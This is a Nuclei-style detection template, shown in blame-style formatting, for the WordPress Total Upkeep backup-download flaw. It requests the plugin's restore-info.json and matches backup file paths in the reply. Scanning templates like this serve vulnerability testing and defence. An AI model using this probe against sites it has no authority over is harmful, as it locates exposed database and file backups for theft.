2021-03-10 11:36:11 +00:00
|
|
|
id: wordpress-total-upkeep-backup-download
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: WordPress Total Upkeep Database and Files Backup Download
|
|
|
|
author: princechaddha
|
|
|
|
severity: high
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/49252
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: wordpress,wp-plugin,edb
|
2021-03-10 11:36:11 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wp-content/plugins/boldgrid-backup/cron/restore-info.json"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "application/json"
|
|
|
|
part: header
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- '"filepath"'
|
|
|
|
- '/wp-content/boldgrid_backup_'
|
|
|
|
condition: and
|
|
|
|
part: body
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|